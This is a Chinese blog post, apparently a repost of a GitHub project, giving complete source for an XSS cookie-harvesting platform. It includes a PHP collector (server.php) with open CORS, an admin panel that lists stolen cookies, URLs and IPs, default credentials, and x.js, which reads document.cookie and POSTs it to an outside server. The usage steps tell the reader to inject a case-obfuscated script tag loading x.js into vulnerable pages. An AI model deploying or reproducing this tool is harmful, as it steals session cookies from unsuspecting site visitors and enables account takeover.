[radio color="blue" checked=""]首先建立css文件夹-并改文件名为:bootstrap.min.css[/radio]
Css源代码:
项目链接地址:https://github.com/truda8/xss-cookies/[radio color="blue" checked="checked"]第二步:建立文件夹install/内放index.php[/radio]
源代码:
请前往项目链接地址下载和学习[radio color="blue" checked="checked"]建立php文件:config.php [/radio]
源代码:
<?php
// Mysql database config
$host = "localhost";
$user = "xss";
$pass = "123456";
$dbname = "xss";
// Admin username and password
$admin_user = "admin";
$admin_pass = "123456";
// 服务端地址
$server_url = "http://127.0.0.1/server.php";
// Create connection
$conn = new mysqli($host, $user, $pass, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>[radio color="blue" checked="checked"]建立index.php文件[/radio]
源代码:
<?php
include("./config.php");
session_start();
// 判断是否登陆
if (!isset($_SESSION["admin"]) or $_SESSION["admin"] !== true) {
// 验证失败
$_SESSION["admin"] = false;
header("Location: " . "./login.php");
die();
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Xss Cookies</title>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style>
td:nth-child(2) {
max-width: 180px;
}
td:nth-child(3) {
max-width: 360px;
}
</style>
</head>
<body class="bg-dark">
<div class="container">
<div class="card text-white bg-success text-center m-3 p-3">
<h3 class="card-header bg-success">🍪Xss Cookies</h3>
<div class="card-body table-responsive">
<table class="table table-hover text-white">
<thead>
<tr>
<th scope="col">Id</th>
<th scope="col-2">Url</th>
<th scope="col">Cookies</th>
<th scope="col">Client ip</th>
<th scope="col">Add date</th>
</tr>
</thead>
<tbody>
<script>
Notiflix.Loading.Hourglass('Loading...');
</script>
<?php
function p($value) {
return htmlspecialchars($value, ENT_QUOTES, 'UTF-8', false);
}
$sql = "SELECT id, target_url, cookies, client_ip, add_date FROM cookies;";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// echo data
while ($row = $result->fetch_assoc()) {
echo '<tr>';
echo '<td scope="row">' . p($row["id"]) . '</td>';
echo '<td><a class="link-info" href="' . p($row["target_url"]) . '" target="_blank">' . p($row["target_url"]) . '</a></td>';
echo '<td scope="row">' . p($row["cookies"]) . '</td>';
echo '<td scope="row">' . p($row["client_ip"]) . '</td>';
echo '<td scope="row">' . p($row["add_date"]) . '</td>';
echo '</tr>';
}
}
?>
<script>
Notiflix.Loading.Remove();
</script>
</tbody>
</table>
</div>
<div class="card-footer bg-success text-gray-600">
In the end.
</div>
</div>
</div>
</body>
</html>[radio color="blue" checked="checked"]建立登录php文件:/login.php [/radio]
源代码:
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login - Xss Cookies</title>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style>
html,body {
margin: 0;
padding: 0;
height: 100vh;
}
.container {
height: 100vh;
}
.row {
height: 100vh;
}
</style>
<script src="js/notiflix-aio-2.7.0.min.js"></script>
</head>
<body class="bg-dark">
<div class="container">
<div class="row align-items-center justify-content-md-center">
<div class="col-sm-12 col-lg-6">
<h3 class="text-light">Xss Cookies 登录</h3>
<form class="text-light" method="POST" action="./login.php">
<div class="mb-3">
<label for="username" class="form-label">用户名</label>
<input type="text" class="form-control" id="username" name="username">
</div>
<div class="mb-3">
<label for="password" class="form-label">密码</label>
<input type="password" class="form-control" id="password" name="password">
</div>
<div class="mb-3">
<input type="checkbox" class="form-check-input" id="Check">
<label class="form-check-label" for="Check">记住密码</label>
</div>
<button type="submit" class="btn btn-primary">立即登录</button>
</form>
</div>
</div>
</div>
<script>
Notiflix.Report.Init({
messageFontSize:'18px',
});
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
include("./config.php");
session_start();
$username = $_POST["username"];
$password = $_POST["password"];
if ($username === $admin_user && $password === $admin_pass) {
$_SESSION["admin"] = true;
$success = "
Notiflix.Report.Success('登录成功',
'即将跳转到管理页面...',
'立即跳转',
function(){
window.location.href = './index.php';
});
setTimeout(function(){
window.location.href = './index.php';
},3000);
";
echo $success;
} else {
$error = "Notiflix.Report.Failure('登录失败',
'账号或密码错误!',
'确定');
";
echo $error;
}
}
?>
</script>
</body>
</html>
Footer
[radio color="blue" checked="checked"]建立客户端php文件:server.php[/radio]
源代码:
<?php
include('./config.php');
// 允许所有域名访问,解决Ajax跨站问题
header('Access-Control-Allow-Origin:*');
// 获取客户端IP
function get_client_ip() {
$ip = null;
if (isset($_SERVER["REMOTE_ADDR"])) {
$ip = $_SERVER["REMOTE_ADDR"];
} else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$ip = trim(current($ip));
} else if (isset($_SERVER["HTTP_X_REAL_IP"])) {
$ip = $_SERVER["HTTP_X_REAL_IP"];
}
return $ip;
}
// Get client data
$url = $_POST['url'];
$cookies = $_POST['cookies'];
$client_ip = get_client_ip();
// Save data
if ($url && $cookies && $client_ip) {
// 预编译
$add_client = $conn->prepare("INSERT INTO cookies (target_url, cookies, client_ip) VALUES (?, ?, ?)");
$add_client->bind_param("sss", $url, $cookies, $client_ip);
$add_client->execute();
$add_client->close();
}
echo 1;
$conn->close();[radio color="blue" checked="checked"]建立cookie js 获取文件:x.js[/radio]
源代码:
let allCookies = document.cookie;
let sererUrl = "http://192.168.3.60/server.php";
let currentUrl = window.location.href;
function sendCookie() {
const xhttp = new XMLHttpRequest();
xhttp.open("POST", sererUrl, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
let data = "cookies=" + allCookies + "&url=" + currentUrl;
xhttp.send(data);
}
if (allCookies && currentUrl) {
// Url encode
allCookies = encodeURIComponent(allCookies);
currentUrl = encodeURIComponent(currentUrl);
sendCookie();
}食用方法和安装:
修改配置文件 config.php 修改以下信息
MySQL 数据库信息
管理员账号密码
服务端地址
- 当前目录所有文件部署到 php web server
- 打开
http://域名/install/进行安装
二、使用 - 将如下代码植入怀疑出现 xss 的地方
<sCRiPt sRC=http://域名/x.js></sCrIpT> - 打开
http://域名/登录查看 cookies 信息
点我进入项目链接地址
Comments | NOTHING
该文章已经关闭评论